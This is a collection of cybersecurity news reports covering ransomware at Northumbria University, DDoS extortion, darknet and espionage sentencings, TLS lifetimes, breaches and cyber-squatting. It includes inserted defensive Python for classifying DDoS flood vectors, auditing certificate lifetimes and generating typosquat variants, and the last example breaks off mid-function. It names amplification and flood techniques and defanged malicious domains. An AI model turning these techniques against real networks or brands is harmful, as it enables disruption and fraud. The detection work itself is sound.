Northumbria University is still reeling from a cyber-attack which forced it to reschedule exams and close its entire campus in Newcastle-Upon-Tyne.
Deputy vice chancellor, Peter Francis, told students on Monday that the “cyber incident” had caused “significant operational disruption” and that work was underway to restore IT systems as quickly as possible.
“For the remainder of this week, there will be no student access to campus whilst we work on restoring our network and connected services,” he continued.
“During the time it will take to restore our key systems, which we hope will be short, you will not have access to the student portal, Blackboard and potentially other university platforms which you use in your day-to-day studies. We have temporarily switched these services off as a precautionary measure.”
The university also tweeted last week that exams had to be cancelled and that it was unable to take calls about clearing, a vital part of the academic calendar in which UK universities and colleges seek to fill places they still have on courses.
Although not officially named, the attack bears all the hallmarks of ransomware. Financially motivated cyber-criminals have been increasingly focusing on the education sector of late as institutions are thought to be more exposed to attacks and under tremendous commercial pressure to ensure uptime for staff and students.
Data released last month revealed that a third of UK universities have been attacked with ransomware in the past decade.
Most recently, a ransomware outage and data breach at US IT services company Blackbaud affected countless educational institutions in the UK and elsewhere. It’s not known if the Northumbria University attack also featured data theft.
Webroot senior threat research analyst, Kelvin Murray, argued that the distributed nature of many university networks makes them hard to manage and secure.
“To get to grips with cybersecurity, institutions need to engage cyber-resilience plans to protect their IT infrastructure and data, regardless of the crisis. IT teams must properly audit all machines connected to their networks and the data they hold,” he added.
“Security awareness training should be implemented for staff and students from day one, ensuring that they are vigilant in scrutinizing the emails they receive. This should be underpinned by cybersecurity technology such as email filtering, anti-virus protection, and sensible password policies.”
Security experts are warning of a new global DDoS-related extortion campaign targeting businesses operating in the e-commerce, finance and travel sectors.
Radware said it had been tracking the threat actors since mid-August, with victims in North America, APAC and EMEA. Emails are typically delivered claiming to come from state-sponsored groups such as Fancy Bear and Lazarus Group, as well as the “Armada Collective.”
The latter group has been linked to similar extortion emails sent in previous years.
The ransom emails threaten to launch DDoS attacks against the recipient organization of over 2Tbps, if payment of anywhere between 10 and 20BTC ($113,000-226,000) is not made. They also threaten to increase the ransom by 10BTC for each deadline missed.
Also included in the messages are the Autonomous System Numbers (ASNs) or IP addresses of servers or services that the group says it will target if their demands are not met.
“In follow-up messages, threat actors underscore that the unique Bitcoin address from the initial letter is still empty and reiterate the seriousness of the threat. They also provide keywords and organization names so the target organization can search for recent DDoS disruptions, followed by the rhetorical question ‘You don't want to be like them, do you?’,” Radware explained.
“In many cases the ransom threat is followed by cyber-attacks ranging from 50Gbps to 200Gbps. The attack vectors include UDP and UDP-Frag floods, some leveraging WS-Discovery amplification, combined with TCP SYN, TCP out-of-state, and ICMP Floods.”
Recipients of the emails were urged not to pay the ransom.
At the same time, Radware claimed to have observed multiple European ISPs being hit by DNS DDoS attacks since last week, although there’s no obvious link to the ransom campaign.
A group using the name “Armada Collective” tried a similar ransom ploy back in 2016, when Cloudflare claimed that it had heard from 100 customers who had received extortion threats and demands for payment of 10-50BTC.
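The vectors Radware describes (UDP and UDP-fragment floods, WS-Discovery amplification, SYN floods, out-of-state TCP and ICMP floods) can be told apart from ordinary flow records. The following is an added example written for this page, not Radware's code or any of its tooling: it classifies constructed NetFlow-style records by vector and rates each (victim, vector) pair in packets per second against a threshold. The Flow layout, the 10-second export window, the threshold and the sample addresses are all assumptions; "out-of-state" is approximated as a non-SYN segment from a source that never sent a SYN to that destination port within the window.

```python
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    """Constructed flow-record layout (assumption, not a vendor export format)."""
    proto: str              # "tcp", "udp" or "icmp"
    src: str
    sport: int
    dst: str
    dport: int
    flags: str = ""         # TCP flags as letters: "S" = SYN, "A" = ACK, "R" = RST, "F" = FIN
    packets: int = 1
    fragment: bool = False  # True for records made of non-initial IP fragments


WS_DISCOVERY_PORT = 3702  # abused WS-Discovery hosts answer *from* UDP/3702


def syn_sources(flows):
    """(src, dst, dport) triples that opened a handshake; used for the state check."""
    return {(f.src, f.dst, f.dport) for f in flows if f.proto == "tcp" and f.flags == "S"}


def classify(flow, seen_syn):
    """Map one flow record to the vector it most likely belongs to."""
    if flow.proto == "icmp":
        return "icmp-flood"
    if flow.proto == "udp":
        if flow.fragment:
            return "udp-frag-flood"
        if flow.sport == WS_DISCOVERY_PORT:
            return "ws-discovery-amplification"
        return "udp-flood"
    if flow.proto == "tcp":
        if flow.flags == "S":
            return "tcp-syn"
        if (flow.src, flow.dst, flow.dport) not in seen_syn:
            return "tcp-out-of-state"  # ACK/RST/FIN with no handshake from that source
        return "tcp-established"
    return "other"


def vector_pps(flows, window_s):
    """Packets per second per (victim, vector) over an export window of window_s seconds."""
    seen_syn = syn_sources(flows)
    totals = Counter()
    for f in flows:
        totals[(f.dst, classify(f, seen_syn))] += f.packets
    return {key: count / window_s for key, count in totals.items()}


def alerts(flows, window_s, threshold_pps):
    """Sorted (victim, vector) pairs at or above the threshold; established TCP never alerts."""
    return sorted(
        (dst, vec)
        for (dst, vec), pps in vector_pps(flows, window_s).items()
        if vec != "tcp-established" and pps >= threshold_pps
    )


# Constructed sample traffic (documentation address ranges), not captured data.
VICTIM = "203.0.113.10"
SAMPLE_FLOWS = (
    # 40 reflectors answering from UDP/3702, 500 packets each
    [Flow("udp", f"198.51.100.{i}", WS_DISCOVERY_PORT, VICTIM, 443, packets=500) for i in range(1, 41)]
    # 100 spoofed sources sending SYN only
    + [Flow("tcp", f"192.0.2.{i}", 40000 + i, VICTIM, 443, flags="S", packets=100) for i in range(1, 101)]
    # ACKs to port 80 from sources that never sent a SYN to port 80
    + [Flow("tcp", f"192.0.2.{i}", 50000, VICTIM, 80, flags="A", packets=100) for i in range(1, 51)]
    # fragmented UDP and a little ICMP
    + [Flow("udp", "198.51.100.200", 5000, VICTIM, 53, packets=1500, fragment=True)]
    + [Flow("icmp", "198.51.100.201", 0, VICTIM, 0, packets=300)]
    # one legitimate client: handshake followed by data
    + [Flow("tcp", "198.18.0.5", 51515, VICTIM, 443, flags="S"),
       Flow("tcp", "198.18.0.5", 51515, VICTIM, 443, flags="A", packets=40)]
)

if __name__ == "__main__":
    for (dst, vec), pps in sorted(vector_pps(SAMPLE_FLOWS, 10).items()):
        print(f"{dst:15} {vec:28} {pps:9.1f} pps")
    print("alerts:", alerts(SAMPLE_FLOWS, 10, 100))
```

The WS-Discovery rule keys on the reflector's source port, which is how amplified replies reach the victim; other reflection services are added the same way by port. The legitimate client's single SYN lands in the SYN total, which is why a rate threshold derived from the victim's baseline, rather than a per-packet rule, decides the alert. The ICMP flow in the sample stays under the threshold and is reported but not alerted.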
An American who was employed to moderate disputes on an illegal darknet marketplace has been sentenced to 11 years in prison.
Bryan Connor Herrell, of Aurora, Colorado, was hired by AlphaBay to settle arguments between vendors and purchasers.
The site operated by his employers facilitated hundreds of thousands of illicit transactions in which guns, drugs, credit card numbers, and stolen identities were purchased along with other illegal contraband.
At the time of Herrell's involvement with AlphaBay, the site was the world's largest online marketplace for drugs.
Herrell was also hired to act as a scam monitor, watching out for attempts by vendors to defraud AlphaBay's users.
The 26-year-old worked for the illegal website under the names "Penissmith" and "Botah." In return for his efforts, he was paid in Bitcoin.
Alexandre Cazes, the alleged founder of AlphaBay, was indicted by a Fresno grand jury on June 1, 2017.
On July 5, 2017, the Royal Thai Police executed an arrest warrant for Canadian-born Cazes at his residence in Bangkok, in connection with his alleged involvement with AlphaBay. The warrant was executed with assistance from the FBI and DEA.
When Cazes was arrested, police found his laptop open and in an unencrypted state. A search of the laptop by law enforcement agents and officers revealed several text files that identified the passwords/passkeys for the AlphaBay website, the AlphaBay servers, and other online identities associated with AlphaBay.
Cazes died in Thailand in the custody of the Narcotics Suppression Bureau just days after his arrest. The 26-year-old's death occurred an hour before he was due to meet with public prosecutors over proceedings relating to his extradition to the United States.
The US indictment against Cazes was dismissed following his death; however, the Department of Justice's investigation of AlphaBay and its former administrators is ongoing.
“This sentence serves as further proof that criminals cannot hide behind technology to break the law,” said US Attorney McGregor Scott of the Eastern District of California.
“Operating behind the veil of the darknet may seem to offer shelter from criminal investigations, but people should think twice before ordering or selling drugs online—you will be caught."
It was announced today that state, local, tribal, and territorial (SLTT) government organizations in the United States are to receive extra support to improve their cybersecurity.
Help is coming in the form of a 12-month project funded by CISA that will enable SLTT security teams to boost their cyber-defenses with an additional layer of Domain Name System (DNS) security.
The US Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) has joined forces with Akamai and the Center for Internet Security (CIS) to offer SLTTs fully managed proactive domain security.
The Malicious Domain Blocking and Reporting (MDBR) service will help SLTTs to better protect their applications accessing web servers and external mail servers, and to enhance their existing network defenses.
MDBR technology acts as a blocker, limiting the risk of infections associated with malware, ransomware, and phishing by preventing IT systems from connecting to malicious web domains.
The service also staves off attacks by stopping malicious software from communicating with its command and control server or domain.
"The MDBR service is based on proven, effective, and easy-to-deploy technology that is designed to quickly help SLTT security teams improve their current security defenses," said Patrick Sullivan, VP and CTO of security strategy at Akamai.
"The real-time threat intelligence in MDBR is based on Akamai's unprecedented global visibility into web and DNS traffic, which is key to enable us to proactively defend against today's evolving threat landscape that SLTT security teams face."
Under the project, the MDBR service will be available at no cost to members of the CIS Multi-State Information Sharing and Analysis Center (MS-ISAC) and Elections Infrastructure Information Sharing and Analysis Center (EI-ISAC®).
"MDBR is built on top of Akamai's Enterprise Threat Protector (ETP) service, which is deployed on its platform that provides carrier-grade recursive DNS service," said Ed Mattison, CIS executive vice president of operations and security services.
"The Akamai Intelligent Edge Platform delivers up to 2.2 trillion DNS queries daily, making it a great partner for this initiative."
To use the service, an organization just has to spend a few minutes pointing its DNS requests to Akamai's DNS servers.
The UK’s National Cyber Security Centre (NCSC) has teamed up with international allies to issue guidelines on how organizations can stay safe from malicious cyber-actors.
The joint cybersecurity advisory "Technical Approaches to Uncovering and Remediating Malicious Activity" was published today in conjunction with the US’s Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre, the New Zealand National Cyber Security Centre and CERT NZ, and the Canadian Communications Security Establishment.
Contained within the advisory are a series of technical approaches that organizations can take to protect their most critical digital assets. The approaches, which are based on best practices, can help to uncover malicious activity and mitigate attacks, if followed.
NCSC director of operations Paul Chichester described cybersecurity as a "global issue that requires a collaborative international effort."
“This advisory will help organizations understand how to investigate cyber incidents and protect themselves online, and we would urge them to follow the guidance carefully," said Chichester.
“Working closely with our allies, and with the help of organizations and the wider public, we will continue to strengthen our defenses to make us the hardest possible target for our adversaries.”
Key takeaways from the advisory include a recommendation to respond to any potential cyber-incident by first collecting relevant artifacts, logs, and data and removing them for further analysis.
Organizations were further advised to avoid tipping off any cyber-adversaries that their presence had been detected on the network and to contemplate seeking help from a third-party IT security organization.
CISA director Chris Krebs said that the joint alert was the first of its kind issued by CISA since the organization was formally established in 2018 and was something that he had "aimed for since day one."
“With our allied cybersecurity government partners, we work together every day to help improve and strengthen the cybersecurity of organizations and sectors of our economy that are increasingly targeted by criminals and nation states alike," said Krebs.
“Fortunately, there's strength in numbers, and this unified approach to combining our experiences with a range of malicious actors means that we're able to extend our defensive umbrella on a global scale.”
A third (33%) of companies in the digital supply chain expose unsafe network services to the internet, putting sensitive data at risk, according to a new report published today by RiskRecon and the Cyentia Institute.
Following an assessment of millions of internet-facing systems across approximately 40,000 commercial and public institutions, it was found that datastores, such as S3 buckets and MySQL databases, are most commonly exposed to the internet. These were followed by remote access services, which is especially concerning given the shift to home working that has taken place during the COVID-19 pandemic.
Education was the sector most likely to expose unsafe network services to the internet, with 51.9% of universities running unsafe services on non-student systems.
The study also revealed significant geographic variation, with Ukraine, Indonesia, Bulgaria, Mexico and Poland having the highest rates of domestically-hosted systems running unsafe services.
Additionally, there was a correlation between exposing unsafe services to the internet and wider critical security issues in the digital supply chain. For instance, failure to patch software and failure to implement web encryption were noted as two of the most prevalent security findings associated with unsafe services.
The study authors added that the impact is exacerbated when vendors and business partners run unsafe, exposed services used by their digital supply chain customers.
Kelly White, CEO and co-founder of RiskRecon, commented: “Blocking internet access to unsafe network services is one of the most basic security hygiene practices. The fact that one-third of companies in the digital supply chain are failing at one of the most basic cybersecurity practices should serve as a wake-up call to executives’ third-party risk management teams.
“We have a long way to go in hardening the infrastructure that we all depend on to safely operate our businesses and protect consumer data. Risk managers will be well served to leverage objective data to better understand and act on their third-party risk.”
A Chinese university professor has been handed an 18-month jail sentence for stealing IP from two US companies several years ago.
Hao Zhang was charged in 2015 along with five other Chinese nationals with economic espionage and theft of trade secrets. While the five remain at large, most likely in China, Zhang made the mistake of re-entering the US and was promptly arrested.
He is said to have met one of the co-conspirators, Wei Pang, while the two were studying for doctorates in electrical engineering at a California university.
They researched DARPA-funded R&D projects into thin-film bulk acoustic resonator (FBAR) technology, which is said to have multiple military and defense applications, and then went on to work on FBAR projects at Avago Technologies and Skyworks Solutions.
Then, in around 2006-7, the two, along with four other conspirators, solicited interest in their work from state-backed Tianjin University and other organizations.
The university agreed to support their plan and in 2009 they resigned from their US roles and accepted full time positions as professors at Tianjin.
Later they formed a joint venture with the university under the name ROFS Microsystems to mass produce FBAR, according to the Department of Justice.
They were accused of stealing “recipes, source code, specifications, presentations, design layouts” and other confidential documents from Skyworks and Avago in order to build a state-of-the-art production facility and win commercial and military contracts.
The case will further bolster US suspicions that Chinese students in the country are a national security threat, whether they have been persuaded by Beijing to steal on behalf of the Communist Party, or are doing so for their own commercial benefit.
The seven-year prosecution of Zhang ended this week with the professor sentenced to a minimum security prison in California and ordered to pay $477,000 to the companies he stole from.
As of September, all publicly trusted TLS certificates must have a lifespan of 398 days or fewer.
The change stems from a statement Apple issued in March, in which it announced it was “reducing the maximum allowed lifetimes of TLS server certificates” as part of its ongoing efforts to improve web security.
The Apple statement claimed TLS server certificates issued on or after September 1, 2020 “must not have a validity period greater than 398 days.” Specifically, this change will affect only TLS server certificates issued from the Root CAs preinstalled with iOS, iPadOS, macOS, watchOS, and tvOS.
Also, this change will affect only TLS server certificates issued on or after September 1, 2020; any certificates issued prior to that date will not be affected by this change. “Connections to TLS servers violating these new requirements will fail,” the statement said. “This might cause network and app failures and prevent websites from loading.”
Apple recommended certificates be issued with a maximum validity of 397 days, and this change will not affect certificates issued from user-added or administrator-added Root CAs.
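The rules above (issued on or after September 1, 2020; no more than 398 days; 397 recommended) are simple to check against a certificate's notBefore and notAfter fields. The following is an added example written for this page, not Apple's or Venafi's code: it evaluates certificate summaries in the dictionary shape that Python's `ssl.SSLSocket.getpeercert()` returns and reports each as ok, warn, fail or exempt. The sample certificates are constructed for illustration, the `peer_cert` helper and the status names are assumptions, and the validity period is counted inclusively (notBefore through notAfter, so one extra second) as RFC 5280 defines it.

```python
import socket
import ssl
from datetime import datetime, timedelta, timezone

HARD_LIMIT_DAYS = 398     # Apple: certificates must not exceed this
RECOMMENDED_DAYS = 397    # Apple: recommended ceiling
EFFECTIVE_FROM = datetime(2020, 9, 1, tzinfo=timezone.utc)  # rule applies to certs issued on/after this date


def _parse(cert_time):
    """getpeercert() renders times like 'Sep 01 00:00:00 2020 GMT'; convert to aware UTC datetime."""
    return datetime.fromtimestamp(ssl.cert_time_to_seconds(cert_time), tz=timezone.utc)


def validity_days(cert):
    """Validity period in days, counted inclusively (notBefore through notAfter) as RFC 5280 does."""
    not_before, not_after = _parse(cert["notBefore"]), _parse(cert["notAfter"])
    return (not_after - not_before + timedelta(seconds=1)).total_seconds() / 86400


def lifetime_status(cert):
    """'exempt' (issued before the cutoff), 'fail' (> 398 d), 'warn' (> 397 d) or 'ok'."""
    days = validity_days(cert)
    if _parse(cert["notBefore"]) < EFFECTIVE_FROM:
        return "exempt"
    if days > HARD_LIMIT_DAYS:
        return "fail"
    if days > RECOMMENDED_DAYS:
        return "warn"
    return "ok"


def audit(certs):
    """Status for each named certificate summary."""
    return {name: lifetime_status(cert) for name, cert in certs.items()}


def peer_cert(host, port=443):
    """Fetch a live server's leaf certificate summary (needs network access; hypothetical helper)."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()


# Constructed certificate summaries in getpeercert() shape; these are not real certificates.
SAMPLE_CERTS = {
    "one-year-ok":   {"notBefore": "Oct 01 00:00:00 2020 GMT", "notAfter": "Oct 02 23:59:59 2021 GMT"},
    "exactly-398":   {"notBefore": "Sep 02 00:00:00 2020 GMT", "notAfter": "Oct 04 23:59:59 2021 GMT"},
    "two-year-fail": {"notBefore": "Sep 02 00:00:00 2020 GMT", "notAfter": "Sep 02 00:00:00 2022 GMT"},
    "legacy-exempt": {"notBefore": "Jan 01 00:00:00 2019 GMT", "notAfter": "Jan 01 00:00:00 2021 GMT"},
}

if __name__ == "__main__":
    for name, status in audit(SAMPLE_CERTS).items():
        print(f"{name:14} {validity_days(SAMPLE_CERTS[name]):8.2f} days  {status}")
```

The "exactly-398" sample shows why the inclusive count matters: 397 days 23:59:59 of wall-clock time is a 398-day validity period, which Apple still accepts but which exceeds the recommended 397. Two limitations to keep in mind: the check cannot tell whether a certificate chains to a preinstalled root or to one an administrator added, so it flags everything and the reader must apply the exemption for private CAs themselves; and `getpeercert()` only returns the parsed dictionary when the chain was validated, so run it with a default context as above.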
According to Venafi, the interval between changes in the length of certificate lifespans has been shrinking over the last decade. It found that before 2011 certificate lifespans were 8–10 years (96 months or more), and that they were gradually reduced over the past decade: to five years, then to three years in 2015, and ultimately to 13 months in 2020, a reduction of 51% from the preceding 27-month limit.
“Apple’s unilateral move to reduce machine identity lifespans will profoundly impact businesses and governments globally,” said Kevin Bocek, vice president of security strategy and threat intelligence at Venafi.
“The interval between certificate lifecycle changes is shrinking, while at the same time, certificates lifecycles themselves are being reduced. In addition, the number of machines—including IoT and smart devices, virtual machines, AI algorithms and containers—that require machine identities is skyrocketing.”
He went on to claim that if the interval between lifecycle changes continues on its current cadence, it’s likely that we could see certificate lifespans for all publicly trusted TLS certificates reduced to six months by early 2021, and perhaps become as short as three months by the end of next year.
“Actions by Apple, Google or Mozilla could accomplish this,” he said. “Ultimately, the only way for organizations to eliminate this external, outside risk is total visibility, comprehensive intelligence and complete automation for TLS machine identities.”
The head of the US Cybersecurity and Infrastructure Security Agency (CISA) has been forced to deny Russian reports that US voter registration information has been circulating on the dark web.
Russian newspaper Kommersant claimed in a story yesterday that a database of 7.6 million Michigan voters was posted to the dark web, as well as millions more related to voters from Florida, Connecticut, North Carolina and Arkansas.
However, the Michigan Department of State responded swiftly to the story, reportedly confirming that the data in question was publicly available via Freedom of Information (FOI) requests.
In a statement on Twitter a few hours ago, CISA director, Chris Krebs, joined the official debunking of the claims.
“My main takeaway: it’s going to be critical over the next few months to maintain our cool and not spin up over every claim. The last measure of resilience is the American voter,” he said.
An official statement from CISA and the FBI claimed the two “have not seen cyber-attacks this year on voter registration databases or on any systems involving voting.”
“Information on US elections is going to grab headlines, particularly if it is cast as foreign interference. Early, unverified claims should be viewed with a healthy dose of skepticism,” it continued.
“More importantly, we encourage voters to look to trusted sources of information, in this case state election officials who have correctly pointed out that a lot of voter registration data is publicly available or easily purchased.”
The incident came as Facebook and Twitter took action to remove the social media profiles associated with Russian ‘news’ site PeaceData, which has been linked to the notorious state-backed misinformation-peddler the Internet Research Agency (IRA).
In Facebook’s case it involved taking down 13 Facebook accounts and two pages.
“This activity focused primarily on the US, UK, Algeria and Egypt, in addition to other English-speaking countries and countries in the Middle East and North Africa,” it said. “We began this investigation based on information about this network’s off-platform activity from the FBI. Our internal investigation revealed the full scope of this network on Facebook.”
Corporate CEOs could soon be personally liable if they fail to adequately secure IT systems connected to the physical world, Gartner has warned.
The analyst firm predicted that as many as 75% of business leaders could be held liable by 2024 due to increased regulations around so-called “cyber-physical systems” (CPSs) such as IoT and operational technology (OT).
Gartner defines CPSs as “engineered to orchestrate sensing, computation, control, networking and analytics to interact with the physical world, including humans.”
In this world, cyber-attacks can lead to human fatalities rather than mere data loss or service outages. For example, a medical device could be hijacked to prevent life-saving drugs from being dispensed, or a connected car could be remotely directed to crash.
Gartner argued that the financial impact of such attacks on CPSs resulting in fatalities could reach as much as $50 billion by 2023.
“Regulators and governments will react promptly to an increase in serious incidents resulting from failure to secure CPSs, drastically increasing rules and regulations governing them,” said Katell Thielemann, research vice president at Gartner.
“In the US, the FBI, NSA and Cybersecurity and Infrastructure Security Agency (CISA) have already increased the frequency and details provided around threats to critical infrastructure-related systems, most of which are owned by private industry. Soon, CEOs won’t be able to plead ignorance or retreat behind insurance policies.”
However, at present, many business leaders aren’t even aware of the scale of CPS investment in their organization, often because projects have happened outside of the control of IT, said Gartner.
This is where technology leaders in the organization must step up to help CEOs understand the risks that CPSs represent, and why more budget needs to be allocated to operational resilience management (ORM) in order to secure them, argued Thielemann.
“The more connected CPSs are, the higher the likelihood of an incident occurring,” she added.
A white supremacist from Florida has been sentenced to 41 months in prison for threatening an African American who announced his candidacy for city council; he was also convicted of cyber-stalking another victim.
In April 2020, Daniel McMahon pleaded guilty to using social media platform Gab to threaten a man identified in court as D.G. after learning in January 2019 that D.G. planned to run for Charlottesville City Council in Virginia.
McMahon also admitted using Facebook messaging app Messenger to cyber-stalk a female political activist described in court documents as Victim 2.
Using a Facebook account in which he called himself "Restore Silent Sam," McMahon threatened to sexually assault Victim 2's daughter, a minor who has been diagnosed with autism.
The convicted cyber-stalker admitted that, at around the same time that he was sending these threats to Victim 2, he was searching online for content relating to sexual contact with girls who have autism.
McMahon masked his identity while online by using the pseudonyms “Jack Corbin,” “Pale Horse,” “Restore Silent Sam,” and “Dakota Stone." Under these names, the 32-year-old actively promoted white supremacy, posted racial slurs, and expressed support for racially motivated violence.
“Americans have the right to run for office in this country without facing racially-bigoted threats of violence,” said Assistant Attorney General Eric Dreiband for the Civil Rights Division.
“Furthermore, no American should have to live with hateful threats of sexual violence."
Following his term of incarceration, McMahon will be placed on three years of supervised release, during which time he will be prohibited from using internet-capable devices without prior court approval.
“The hallmark of our Nation’s democracy is the right to peacefully protest and engage in an effective exchange of ideas via the political process,” said US Attorney Maria Chapa Lopez for the Middle District of Florida.
“When either of these rights are infringed [upon], and individuals are targeted, intimidated, or threatened because of their race/ethnicity or beliefs, the cornerstone of our system is put at risk. Today’s sentence demonstrates our intent to work together to preserve our Nation’s founding principles and ensure that all citizens are protected under the law."
A number of members of parliament have had their email accounts hacked in a cyber-attack on Norway's parliament, the Storting.
The Norwegian parliament's director, Marianne Andreassen, confirmed that threat actors had targeted the parliament last week.
"This has been a significant attack," Andreassen said.
Unauthorized individuals managed to gain access to the email accounts of several elected members of parliament and also to some accounts belonging to parliament employees.
Speaking at a press conference earlier today, Andreassen did not specify how many accounts had been hacked but said that a "limited number" of members of parliament and employees had been impacted by the incident.
Individuals whose accounts were exposed in the attack have been informed, and a report has been filed with the Norwegian police.
A spokesman for Norway's main opposition party, the Labour Party, told public broadcaster NRK that the attack had impacted several Labour Party members and staff.
After the incident was discovered, the Norwegian National Security Authority (NSM) was brought in to counter the attack and get to the bottom of what had happened.
"We have been involved for a few days," said NSM spokesman Trond Oevstedal. "We are assisting parliament with analysis and technical assistance."
Andreassen said that the parliament had discovered "anomalies a little more than a week ago."
"A number of risk-reducing immediate measures were implemented to stop the attack," said Andreassen. "These measures had an immediate effect."
In a statement issued earlier today, the Storting said that the attackers had made off with an unspecified amount of information.
It read: "Burglary has been registered in the email accounts of a small number of parliamentary representatives and employees. Our analyses show that different amounts of data have been downloaded."
No information has been released regarding what kind of cyber-attack was perpetrated against the Norwegian parliament or who was responsible for it.
"We don't know who's behind it," Andreassen told reporters.
"We take the matter very seriously, and we have full attention to analyzing the situation to get an overall picture of the incident and the potential extent of damage."
The website of the Storting, Norway's single-chamber parliament, was functioning normally on Tuesday after news of the cyber-attack was released.
Cybersecurity services company BlueVoyant has today announced a range of high profile appointments across its board of directors and advisory board.
With immediate effect, Deborah Plunkett and Ariel Litvin have joined the firm’s board of directors while Ronald Moultrie has been made vice president of its advisory board.
The appointments are designed to add substantial extra industry knowledge and experience to the business as it looks to continue its growth.
Plunkett is currently principal of the consultancy Plunkett Associates LLC, as well as senior fellow at Harvard and a professor at the University of Maryland. In more than 30 years as a cybersecurity leader, Plunkett has previously held the post of director of information assurance at the National Security Agency (NSA) and was on the National Security Council at the White House for two administrations.
Litvin, who is the CISO of a global multi-billion dollar private manufacturing company, has expertise in addressing complex business and compliance-related issues faced by modern organizations.
Moultrie, who is joining BlueVoyant’s advisory board, is currently on the boards of Altamira Technologies Corporation, iCapital Network, the National Intelligence University, Sequoia Inc. and The Better Angels Society, in addition to being senior advisor to MITRE, Pallas, and Resolute Consulting. Previously, Moultrie was a senior national security official who spent over three decades serving the US government. He has also held a senior position at the Central Intelligence Agency (CIA) and was the NSA’s director of operations.
Jim Rosenthal, co-founder and CEO of BlueVoyant, commented: “We are very excited to welcome Deborah and Ariel to our Board and delighted that Ron has joined our Advisory Board.
“Breadth of skills, backgrounds and experiences make us a stronger company. Because of their extraordinary talent and accomplishments, the three people joining us have many cyber-related opportunities - we are really pleased that they have chosen to join BlueVoyant.”
The American Payroll Association (APA) has issued a data breach notification after being hit by a skimming attack.
Threat actors installed skimming malware on both the login web page of the APA website and the checkout section of the association's online store by exploiting a vulnerability in the APA’s content management system.
The data security incident was discovered "on or around July 13, 2020." An investigation by the APA's IT team uncovered unusual activity on the APA site dating back to May 13, 2020.
As a result of the attack, unauthorized individuals gained access to login credentials, personal information, including names and dates of birth, and individual payment card information.
A security incident notice sent to customers by the APA in August and signed by the association's senior director of government and public relations, Robert Wagner, states: "The unauthorized individuals gained access to login information (i.e., username and password) and individual payment card information (i.e., credit card information and associated data).
"By way of account access, the electronic fields that may have been accessed include: First and Last Names; Email Address; Job Title and Job Role; Primary Job Function and to whom you 'Report'; Gender; Date of Birth; Address (either business or personal), including country, province or state, city, and postal code; Company name and size; Employee Industry; Payroll Software used at Workplace; Time and Attendance software used at work."
Cyber-attackers were also able to access profile photos and social media username information contained in some accounts.
Since the attack, the APA has installed additional antivirus software on its servers, installed "the latest security patches from our content management system," and increased the frequency of patch implementation.
Victims of the data breach have been offered 12 months of free credit monitoring and $1,000,000 in identity theft insurance.
"The APA is an attractive target for Magecart attackers since their members have access to tools and systems that contain payroll data for millions of individuals. The attackers can brute force other payroll systems using the same stolen credentials to find other account takeover targets," commented Ameet Naik, security evangelist at PerimeterX.
Cyber-criminals are regularly mimicking the domain names of mainstream global brands to scam consumers, a practice known as cyber-squatting, according to a new study by Palo Alto Networks.
It found that the types of domains most commonly impersonated for malicious purposes relate to the most profitable companies worldwide, such as mainstream search engines and social media, financial, shopping, and banking websites. The primary purpose is to launch phishing attacks and scams on users in order to steal credentials or money.
Companies mimicked in the top 20 most abused domains in December 2019 based on adjusted malicious rate included PayPal, Apple, Netflix and Amazon.
Cyber-squatting is the registration of domain names that try to trick users into believing they are related to existing brands, typically by intentionally misspelling variants of their names. Whilst not always done with malicious intent, many of these domains pose a cyber-risk to visitors, and bad-faith registration of them is actionable in the US under the Anticybersquatting Consumer Protection Act.
According to Palo Alto Networks' analysis, 36.57% (5104) of the squatting domains registered in December 2019 showed evidence of association with malicious URLs within the domain or of bulletproof hosting, while 18.59% (2595) were confirmed malicious, distributing malware or conducting phishing attacks. In total, 13,857 squatting domains were registered in December 2019, an average of around 450 per day.
The cybersecurity firm added that it observed “a variety of malicious domains with different objectives” in the period from December 2019 to date. Examples included a domain related to Amazon (amazon-india[.]online) specifically targeting mobile users in India to steal user credentials, a domain related to Samsung (samsungeblyaiphone[.]com) that aimed to steal credit card information by hosting Azorult malware, and domains related to Walmart (walrmart44[.]com) and Samsung (samsungpr0mo[.]online) that distributed potentially unwanted programs such as spyware and adware.
Palo Alto Networks commented: “Domain squatting techniques leverage the fact that users rely on domain names to identify brands and services on the Internet. These squatting domains are often used for nefarious activities, including phishing, malware and PUP distribution, C2 and various scams.”
It advised: “We recommend that enterprises block and closely monitor their traffic, while consumers should make sure that they type domain names correctly and double-check that the domain owners are trusted before entering any site.”
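The monitoring Palo Alto Networks recommends starts with knowing which typo variants of your own brand to watch for. The following Python is an added example, not code from Palo Alto Networks or from the report: it generates the single-edit typosquat variants of a watch-list of brand labels (omission, repetition, transposition, insertion, digit homoglyphs) and classifies an observed domain against them, including the combosquatting pattern (brand plus extra words or digits) seen in the amazon-india and samsungpr0mo examples above. The brand list, the homoglyph table and the simple "label.tld" split are assumptions for the example; production code should apply the Public Suffix List.

```python
import re
from typing import Dict, List, Optional, Tuple

# Digit look-alikes attackers swap in for letters (the "pr0mo" in samsungpr0mo).
HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5", "b": "8", "g": "9"}
ALPHABET = "abcdefghijklmnopqrstuvwxyz"

# Hypothetical watch-list of brand labels for this example.
BRANDS = ["paypal", "apple", "netflix", "amazon", "walmart", "samsung"]


def squat_variants(brand: str) -> Dict[str, str]:
    """Map every single-edit typo of a brand label to the technique that produces it."""
    b = brand.lower()
    out: Dict[str, str] = {}
    for i in range(len(b)):
        out.setdefault(b[:i] + b[i + 1:], "omission")             # walmart -> walmar
        out.setdefault(b[:i] + b[i] + b[i:], "repetition")         # walmart -> wallmart
        if b[i] in HOMOGLYPHS:
            out.setdefault(b[:i] + HOMOGLYPHS[b[i]] + b[i + 1:], "homoglyph")  # paypal -> payp4l
    for i in range(len(b) - 1):
        out.setdefault(b[:i] + b[i + 1] + b[i] + b[i + 2:], "transposition")  # walmart -> wamlart
    for i in range(len(b) + 1):
        for c in ALPHABET:
            out.setdefault(b[:i] + c + b[i:], "insertion")         # walmart -> walrmart
    out.pop(b, None)  # no edit is allowed to reproduce the brand itself
    return out


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance; the catch-all for substitutions and double typos."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
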